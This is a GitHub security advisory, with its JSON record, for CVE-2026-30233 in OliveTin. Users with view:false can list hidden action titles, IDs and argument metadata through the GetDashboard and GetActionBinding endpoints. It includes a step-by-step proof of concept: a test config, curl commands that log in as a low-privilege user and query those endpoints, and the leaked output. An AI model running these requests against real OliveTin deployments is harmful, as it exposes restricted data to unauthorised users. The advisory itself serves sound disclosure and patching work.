GHSA-JF73-858C-54PG
Vulnerability from github – Published: 2026-03-05 21:24 – Updated: 2026-03-06 22:52Summary
An authorization flaw in OliveTin allows authenticated users with view: false permission to enumerate action bindings and metadata via dashboard and API endpoints.
Although execution (exec) may be correctly denied, the backend does not enforce IsAllowedView() when constructing dashboard and action binding responses. As a result, restricted users can retrieve action titles, IDs, icons, and argument metadata.
Details
OliveTin defines a view permission in its ACL model (acl.go). However, this permission is not consistently enforced when building dashboard and action metadata responses.
Relevant source locations:
dashboards.go (around line 120, 132) apiActions.go (around line 122) acl.go (around line 125) api.go (around line 430)
Dashboard building logic:
for _, binding := range rr.ex.MapActionBindings {
if binding.Action.Hidden { continue }
action := buildAction(binding, rr) // checks IsAllowedExec only
fieldset.Contents = append(fieldset.Contents, ...)
}
Why vulnerable: IsAllowedView() exists but is not enforced when building dashboard/action metadata. Users with view:false still receive action titles/icons/argument metadata (with canExec:false).
PoC
- Configure OliveTin with a restricted user:
Create config.yaml:
authRequireGuestsToLogin: true
authLocalUsers:
enabled: true
users:
- username: admin
password: "$argon2id$v=19$m=65536,t=4,p=2$puyxA0s555TSFx7hnFLCXA$PyhLGpZtvpMMvc2DgMWkM8OJMKO55euwV5gm//1iwx4" # password: admin123
permissions:
view: true
exec: true
logs: true
- username: low
password: "$argon2id$v=19$m=65536,t=4,p=2$puyxA0s555TSFx7hnFLCXA$PyhLGpZtvpMMvc2DgMWkM8OJMKO55euwV5gm//1iwx4" # password: low123
permissions:
view: false # Should hide all actions
exec: false
logs: false
actions:
- title: "Secret Action"
id: secret_action
shell: echo "sensitive operation"
icon: "🔒"
description: "This action should be completely hidden"
arguments:
- name: target
title: Target
type: string
default: production
-
Start OliveTin with this configuration
-
Login as low-privilege user and capture session ID:
# Login as low user
LOW_SID=$(curl -s -i -X POST http://localhost:1337/api/LocalUserLogin \
-H 'Content-Type: application/json' \
-d '{"username":"low","password":"low123"}' \
| awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}' | tr -d ' ')
echo "Low user SID: $LOW_SID"
- Verify the web UI respects view:false (optional but illustrative):
Open http://localhost:1337 in a browser logged in as low user - the "Secret Action" should NOT appear in the UI.
- Test 1: GetDashboard endpoint leaks action metadata:
curl -s -X POST http://localhost:1337/api/GetDashboard \
-H 'Content-Type: application/json' \
-H "Cookie: olivetin-sid-local=$LOW_SID" \
-d '{"title":"Actions"}' | jq '.fieldsets[0].contents[] | select(.action.bindingId=="secret_action")'
Expected behavior (if fixed): Empty result or no matching action Observed behavior (vulnerable):
{
"action": {
"bindingId": "secret_action",
"title": "Secret Action",
"icon": "🔒",
"description": "This action should be completely hidden",
"canExec": false,
"arguments": [
{
"name": "target",
"title": "Target",
"type": "string",
"default": "production"
}
]
}
}
- Test 2: GetActionBinding endpoint directly exposes action details:
curl -s -X POST http://localhost:1337/api/GetActionBinding \
-H 'Content-Type: application/json' \
-H "Cookie: olivetin-sid-local=$LOW_SID" \
-d '{"bindingId":"secret_action"}' | jq '.'
Expected behavior (if fixed): HTTP 403 Permission Denied Observed behavior (vulnerable):
{
"action": {
"bindingId": "secret_action",
"title": "Secret Action",
"icon": "🔒",
"description": "This action should be completely hidden",
"canExec": false,
"arguments": [...]
}
}
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/OliveTin/OliveTin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260305082002-d7962710e7c4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30233"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T21:24:24Z",
"nvd_published_at": "2026-03-06T21:16:17Z",
"severity": "MODERATE"
},
"details": "### Summary\nAn authorization flaw in OliveTin allows authenticated users with view: false permission to enumerate action bindings and metadata via dashboard and API endpoints.\n\nAlthough execution (exec) may be correctly denied, the backend does not enforce IsAllowedView() when constructing dashboard and action binding responses. As a result, restricted users can retrieve action titles, IDs, icons, and argument metadata.\n\n### Details\nOliveTin defines a view permission in its ACL model (acl.go). However, this permission is not consistently enforced when building dashboard and action metadata responses.\n\nRelevant source locations:\n\ndashboards.go (around line 120, 132)\napiActions.go (around line 122)\nacl.go (around line 125)\napi.go (around line 430)\n\nDashboard building logic:\n```\nfor _, binding := range rr.ex.MapActionBindings {\n if binding.Action.Hidden { continue }\n action := buildAction(binding, rr) // checks IsAllowedExec only\n fieldset.Contents = append(fieldset.Contents, ...)\n}\n```\nWhy vulnerable: IsAllowedView() exists but is not enforced when building dashboard/action metadata. Users with view:false still receive action titles/icons/argument metadata (with canExec:false).\n\n### PoC\n\n\n\n\n1. Configure OliveTin with a restricted user:\n\nCreate config.yaml:\n\n```yaml\nauthRequireGuestsToLogin: true\n\nauthLocalUsers:\n enabled: true\n users:\n - username: admin\n password: \"$argon2id$v=19$m=65536,t=4,p=2$puyxA0s555TSFx7hnFLCXA$PyhLGpZtvpMMvc2DgMWkM8OJMKO55euwV5gm//1iwx4\" # password: admin123\n permissions:\n view: true\n exec: true\n logs: true\n \n - username: low\n password: \"$argon2id$v=19$m=65536,t=4,p=2$puyxA0s555TSFx7hnFLCXA$PyhLGpZtvpMMvc2DgMWkM8OJMKO55euwV5gm//1iwx4\" # password: low123\n permissions:\n view: false # Should hide all actions\n exec: false\n logs: false\n\nactions:\n - title: \"Secret Action\"\n id: secret_action\n shell: echo \"sensitive operation\"\n icon: \"\ud83d\udd12\"\n description: \"This action should be completely hidden\"\n arguments:\n - name: target\n title: Target\n type: string\n default: production\n```\n2. Start OliveTin with this configuration\n\n3. Login as low-privilege user and capture session ID:\n\n```bash\n# Login as low user\nLOW_SID=$(curl -s -i -X POST http://localhost:1337/api/LocalUserLogin \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"low\",\"password\":\"low123\"}\u0027 \\\n | awk -F\u0027[=;]\u0027 \u0027/^Set-Cookie: olivetin-sid-local=/{print $2; exit}\u0027 | tr -d \u0027 \u0027)\n\necho \"Low user SID: $LOW_SID\"\n```\n4. Verify the web UI respects view:false (optional but illustrative):\n\nOpen http://localhost:1337 in a browser logged in as low user - the \"Secret Action\" should NOT appear in the UI.\n\n5. Test 1: GetDashboard endpoint leaks action metadata:\n\n```bash\ncurl -s -X POST http://localhost:1337/api/GetDashboard \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n -d \u0027{\"title\":\"Actions\"}\u0027 | jq \u0027.fieldsets[0].contents[] | select(.action.bindingId==\"secret_action\")\u0027\n```\nExpected behavior (if fixed): Empty result or no matching action\nObserved behavior (vulnerable):\n\n```json\n{\n \"action\": {\n \"bindingId\": \"secret_action\",\n \"title\": \"Secret Action\",\n \"icon\": \"\ud83d\udd12\",\n \"description\": \"This action should be completely hidden\",\n \"canExec\": false,\n \"arguments\": [\n {\n \"name\": \"target\",\n \"title\": \"Target\",\n \"type\": \"string\",\n \"default\": \"production\"\n }\n ]\n }\n}\n```\n6. Test 2: GetActionBinding endpoint directly exposes action details:\n\n```bash\ncurl -s -X POST http://localhost:1337/api/GetActionBinding \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n -d \u0027{\"bindingId\":\"secret_action\"}\u0027 | jq \u0027.\u0027\n```\nExpected behavior (if fixed): HTTP 403 Permission Denied\nObserved behavior (vulnerable):\n\n```json\n{\n \"action\": {\n \"bindingId\": \"secret_action\",\n \"title\": \"Secret Action\",\n \"icon\": \"\ud83d\udd12\",\n \"description\": \"This action should be completely hidden\",\n \"canExec\": false,\n \"arguments\": [...]\n }\n}\n```",
"id": "GHSA-jf73-858c-54pg",
"modified": "2026-03-06T22:52:34Z",
"published": "2026-03-05T21:24:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-jf73-858c-54pg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30233"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/commit/d7962710e7c46f6bdda4188b5b0cdbde4be665a0"
},
{
"type": "PACKAGE",
"url": "https://github.com/OliveTin/OliveTin"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "OliveTin doesn\u0027t check view permission when returning dashboards"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.